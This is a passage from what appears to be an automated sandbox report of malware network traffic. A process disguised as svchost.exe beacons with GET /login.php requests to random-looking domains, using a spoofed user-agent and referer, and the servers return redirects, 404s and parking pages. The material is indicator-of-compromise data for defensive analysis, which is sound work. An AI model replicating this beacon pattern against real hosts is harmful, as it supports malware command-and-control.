                                                                                                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.016472101 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.403179884 CET981INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:27 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://qegyhig.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=44YvV0J%2BY5Cfs%2BuPg0E4zgulj0q8sfin%2FFgH1NeRFsgzoMTz23%2BWbQB7v%2BhJx8LuTHNWJHMgmGIO4AaXIo3Lz2Wi3P95HPUZtPs44seGoJmTBrH6kDEfG2iTzIeE8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff9d52f523905-YYZ
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11719&sent=8&recv=10&lost=0&retrans=0&sent_bytes=1943&recv_bytes=729&delivery_rate=367668&cwnd=40&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                          Nov 11, 2024 18:24:29.473287106 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:29.830542088 CET979INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:29 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://qegyhig.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3bh7cbQWS%2FBAMJrT9jMGafrcsJUn58NQIW2hpwFsPnEXVRDdPa17voRxKxvnKVpW8qkNuPdZUNtOmasIv4xxTe06JGx3%2FvvhZVkO9g%2BWYrk9OjQA3sb9No%2FSfObsoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff9e48d353905-YYZ
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11720&sent=11&recv=13&lost=0&retrans=0&sent_bytes=2924&recv_bytes=972&delivery_rate=367668&cwnd=4&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          5192.168.2.849710199.59.243.227801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.126470089 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vojyqem.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.552552938 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:24:05 GMT
                                                                                                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                                                                                                          content-length: 1094
                                                                                                                                                                                                          x-request-id: 244ca17e-8cf9-4dfe-af64-36b71a041679
                                                                                                                                                                                                          cache-control: no-store, max-age=0
                                                                                                                                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                          set-cookie: parking_session=244ca17e-8cf9-4dfe-af64-36b71a041679; expires=Mon, 11 Nov 2024 17:39:05 GMT; path=/
                                                                                                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.552577019 CET528INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                          Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjQ0Y2ExN2UtOGNmOS00ZGZlLWFmNjQtMzZiNzFhMDQxNjc5IiwicGFnZV90aW1lIjoxNzMxMzQ1ODQ1LCJwYWdlX3VybCI6I


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          6192.168.2.849711208.100.26.245801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.147332907 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyvyxor.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.597573996 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:05 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.606056929 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyvyxor.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.709156990 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:05 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.829626083 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyvyxor.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.932585001 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:26 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.994374990 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyvyxor.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.365720034 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:27 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.368010998 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:27 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          7192.168.2.8497123.94.10.34801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.152641058 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lymyxid.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.579682112 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:05 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=b0c92c07333a979010e875aeecca3d34|66.23.206.109|1731345845|1731345845|0|1|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          8192.168.2.84971375.2.71.199801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.154633999 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: puzylyp.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.580854893 CET166INHTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Location: https://puzylyp.com/login.php
                                                                                                                                                                                                          Server: Caddy
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:05 GMT
                                                                                                                                                                                                          Content-Length: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          9192.168.2.84971544.221.84.105801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.159543991 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
